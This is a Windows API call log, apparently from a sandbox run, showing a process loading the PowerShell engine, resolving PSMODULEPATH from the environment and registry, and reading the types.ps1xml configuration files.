	[0288.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0290.933] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0290.933] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0290.933] CoTaskMemFree (pv=0x2468a0) 
	[0290.934] CoTaskMemAlloc (cb=0xcc) returned 0x2f62b0
	[0290.934] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2f62b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0290.934] CoTaskMemFree (pv=0x2f62b0) 
	[0290.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cda28 | out: phkResult=0x1cda28*=0x320) returned 0x0
	[0290.935] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd9ac, lpData=0x0, lpcbData=0x1cd9a8*=0x0 | out: lpType=0x1cd9ac*=0x2, lpData=0x0, lpcbData=0x1cd9a8*=0x6c) returned 0x0
	[0290.935] CoTaskMemAlloc (cb=0x70) returned 0x290f40
	[0290.935] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd97c, lpData=0x290f40, lpcbData=0x1cd978*=0x6c | out: lpType=0x1cd97c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1cd978*=0x6c) returned 0x0
	[0290.935] CoTaskMemFree (pv=0x290f40) 
	[0290.935] CoTaskMemAlloc (cb=0xcc) returned 0x2f62b0
	[0290.935] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2f62b0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0290.935] CoTaskMemFree (pv=0x2f62b0) 
	[0290.935] CoTaskMemAlloc (cb=0xcc) returned 0x2f62b0
	[0290.935] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2f62b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0290.935] CoTaskMemFree (pv=0x2f62b0) 
	[0290.939] RegCloseKey (hKey=0x320) returned 0x0
	[0290.939] CoTaskMemAlloc (cb=0xcc) returned 0x2f62b0
	[0290.939] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2f62b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0290.939] CoTaskMemFree (pv=0x2f62b0) 
	[0290.939] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cda28 | out: phkResult=0x1cda28*=0x320) returned 0x0
	[0290.939] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd9ac, lpData=0x0, lpcbData=0x1cd9a8*=0x0 | out: lpType=0x1cd9ac*=0x0, lpData=0x0, lpcbData=0x1cd9a8*=0x0) returned 0x2
	[0290.939] RegCloseKey (hKey=0x320) returned 0x0
	[0290.943] CoTaskMemAlloc (cb=0x20c) returned 0x2ddc90
	[0290.943] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ddc90 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0290.944] CoTaskMemFree (pv=0x2ddc90) 
	[0290.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0290.945] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0290.952] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0290.952] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.952] CoTaskMemFree (pv=0x2468a0) 
	[0290.954] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0290.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.954] CoTaskMemFree (pv=0x2468a0) 
	[0290.959] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0290.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.959] CoTaskMemFree (pv=0x2468a0) 
	[0290.959] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0290.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.959] CoTaskMemFree (pv=0x2468a0) 
	[0290.961] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd818 | out: phkResult=0x1cd818*=0x328) returned 0x0
	[0290.961] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x1cd82c, lpData=0x0, lpcbData=0x1cd828*=0x0 | out: lpType=0x1cd82c*=0x1, lpData=0x0, lpcbData=0x1cd828*=0x74) returned 0x0
	[0290.962] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x1cd79c, lpData=0x0, lpcbData=0x1cd798*=0x0 | out: lpType=0x1cd79c*=0x1, lpData=0x0, lpcbData=0x1cd798*=0x74) returned 0x0
	[0290.962] CoTaskMemAlloc (cb=0x78) returned 0x290f40
	[0290.962] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x1cd76c, lpData=0x290f40, lpcbData=0x1cd768*=0x74 | out: lpType=0x1cd76c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd768*=0x74) returned 0x0
	[0290.962] CoTaskMemFree (pv=0x290f40) 
	[0290.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0290.962] SetErrorMode (uMode=0x1) returned 0x1
	[0290.962] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd6f0 | out: lpFileInformation=0x1cd6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0290.962] SetErrorMode (uMode=0x1) returned 0x1
	[0290.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0290.963] SetErrorMode (uMode=0x1) returned 0x1
	[0290.963] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd6f0 | out: lpFileInformation=0x1cd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0290.963] SetErrorMode (uMode=0x1) returned 0x1
	[0290.965] SetErrorMode (uMode=0x1) returned 0x1
	[0290.965] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd6f0 | out: lpFileInformation=0x1cd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0290.966] SetErrorMode (uMode=0x1) returned 0x1
	[0290.966] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0290.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.966] CoTaskMemFree (pv=0x2468a0) 
	[0290.967] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0290.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.967] CoTaskMemFree (pv=0x2468a0) 
	[0290.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0290.973] SetErrorMode (uMode=0x1) returned 0x1
	[0290.973] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0290.973] GetFileType (hFile=0x32c) returned 0x1
	[0290.973] SetErrorMode (uMode=0x1) returned 0x1
	[0290.973] GetFileType (hFile=0x32c) returned 0x1
	[0291.817] ReadFile (in: hFile=0x32c, lpBuffer=0x2e3b528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2e3b528*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0291.819] ReadFile (in: hFile=0x32c, lpBuffer=0x2e3b528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2e3b528*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0291.820] ReadFile (in: hFile=0x32c, lpBuffer=0x2e3b528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2e3b528*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0291.820] ReadFile (in: hFile=0x32c, lpBuffer=0x2e3b528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2e3b528*, lpNumberOfBytesRead=0x1cd628*=0xcf3, lpOverlapped=0x0) returned 1
	[0291.820] ReadFile (in: hFile=0x32c, lpBuffer=0x2e3a983, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2e3a983*, lpNumberOfBytesRead=0x1cd628*=0x0, lpOverlapped=0x0) returned 1
	[0291.820] ReadFile (in: hFile=0x32c, lpBuffer=0x2e3b528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2e3b528*, lpNumberOfBytesRead=0x1cd628*=0x0, lpOverlapped=0x0) returned 1
	[0291.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0291.823] SetErrorMode (uMode=0x1) returned 0x1
	[0291.823] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd5a0 | out: lpFileInformation=0x1cd5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0291.823] SetErrorMode (uMode=0x1) returned 0x1
	[0291.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0291.824] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x32c) returned 0x0
	[0291.824] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd60c, lpData=0x0, lpcbData=0x1cd608*=0x0 | out: lpType=0x1cd60c*=0x1, lpData=0x0, lpcbData=0x1cd608*=0x56) returned 0x0
	[0291.824] CoTaskMemAlloc (cb=0x5a) returned 0x1b830890
	[0291.824] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd5dc, lpData=0x1b830890, lpcbData=0x1cd5d8*=0x56 | out: lpType=0x1cd5dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd5d8*=0x56) returned 0x0
	[0291.824] CoTaskMemFree (pv=0x1b830890) 
	[0291.824] RegCloseKey (hKey=0x32c) returned 0x0
	[0291.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0291.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0291.835] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0291.844] SetErrorMode (uMode=0x1) returned 0x1
	[0291.844] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0291.844] GetFileType (hFile=0x32c) returned 0x1
	[0291.844] SetErrorMode (uMode=0x1) returned 0x1
	[0291.844] GetFileType (hFile=0x32c) returned 0x1
	[0292.530] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.531] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.531] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.531] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.531] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.531] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.532] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.532] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.532] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.533] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.533] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.533] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.534] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.534] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.535] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.535] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.535] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.536] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.537] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
